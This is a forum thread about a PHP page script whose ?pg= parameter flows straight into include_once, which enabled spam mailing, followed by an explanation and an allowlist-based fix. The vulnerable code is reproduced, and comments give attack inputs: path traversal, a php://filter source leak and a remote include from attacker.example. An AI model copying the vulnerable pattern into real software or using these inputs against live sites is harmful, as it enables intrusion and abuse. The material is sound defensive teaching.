Security Issues With This Code?


mikebrum

I've been told (by our hosting) that there might be a security issue with this code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<?php include_once('includes/header.php'); ?>
<body>
<div id="wrapper">
	<?php include_once('includes/navigation.php'); ?>
	<a id="top"></a>
	<div id="header">
		<?php include_once('includes/headerLeft.php'); ?>
		<div id="headerRight">
		<?php
			$pg = $_GET['pg'];
			if ($pg == '') { $pg = 'home'; }
		?>
			<img src="images/<?php echo $pg; ?>.jpg" alt="" />
		</div>
	</div>
	<div id="content">
		<?php include_once($pg . '.php'); ?>
	</div>
	<?php include_once('includes/footer.php'); ?>
</div>
</body>
</html>

We've been told that e-mails were sent (through this code) on our behalf. Any help would be appreciated, and thank you in advance for your help!

Mike


Well, you are basically allowing the user to include any PHP file they want through this line:

<?php include_once($pg . '.php'); ?>

You could negate that by filtering the input (e.g. only allowing certain values or removing forward slashes).

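To make the reply above concrete, here is an added example (not code from the original post or from either poster) that puts the vulnerable include next to a hardened version built on the first option the reply mentions, an allowlist of permitted values. The page names and the pages/ directory are assumptions for illustration; the idea is that the request parameter is only ever used as a lookup key and the file name always comes from the map.

```php
<?php
// Added example, not code from the original post. It shows the vulnerable
// include from the thread beside a hardened version that maps ?pg= onto a
// fixed allowlist of files. The page names and the pages/ directory are
// assumptions made for illustration.

declare(strict_types=1);

// --- Vulnerable (as posted): the request parameter becomes the include path.
//   ?pg=../../../../tmp/evil                            -> includes /tmp/evil.php
//   ?pg=php://filter/convert.base64-encode/resource=config -> leaks config.php source
// With allow_url_include=On, ?pg=http://attacker.example/shell fetches and
// runs remote code. Any of these is enough to get a mailer script running
// under the site's own account.
function include_page_vulnerable(): void
{
    $pg = $_GET['pg'] ?? '';
    if ($pg == '') { $pg = 'home'; }
    include_once($pg . '.php');
}

// --- Hardened: allowlist. The request value is only ever used as a key;
// the file that gets included comes from this map, never from the request.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Returns the validated page key. Anything missing, empty, or not in the
// allowlist (e.g. "../etc/passwd" or "php://filter/...") falls back to 'home'.
function resolve_page(?string $requested): string
{
    if ($requested === null || $requested === '') {
        return 'home';
    }
    return array_key_exists($requested, PAGES) ? $requested : 'home';
}

function include_page_hardened(): void
{
    // ?pg[]=x would arrive as an array; treat anything that is not a string
    // as absent rather than letting it reach the lookup.
    $raw = (isset($_GET['pg']) && is_string($_GET['pg'])) ? $_GET['pg'] : null;
    $pg  = resolve_page($raw);

    // Header image: the key is already allowlisted, but escape it anyway so
    // the same pattern stays safe if the allowlist is ever relaxed.
    echo '<img src="images/' . htmlspecialchars($pg, ENT_QUOTES, 'UTF-8') . '.jpg" alt="" />';

    include_once PAGES[$pg];
}

// Quick check of how inputs resolve (run from the CLI: php this_file.php).
if (PHP_SAPI === 'cli') {
    $samples = ['', 'about', '../../etc/passwd', 'php://filter/resource=home', 'contact'];
    foreach ($samples as $input) {
        printf("%-32s -> %s\n", var_export($input, true), resolve_page($input));
    }
}
```

The allowlist is preferable to stripping characters because it does not depend on guessing every dangerous pattern (traversal, stream wrappers, remote URLs); anything that is not an exact key in PAGES is rejected. When a new page is added it has to be registered in the map, which is a small cost for never building an include path out of user input.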
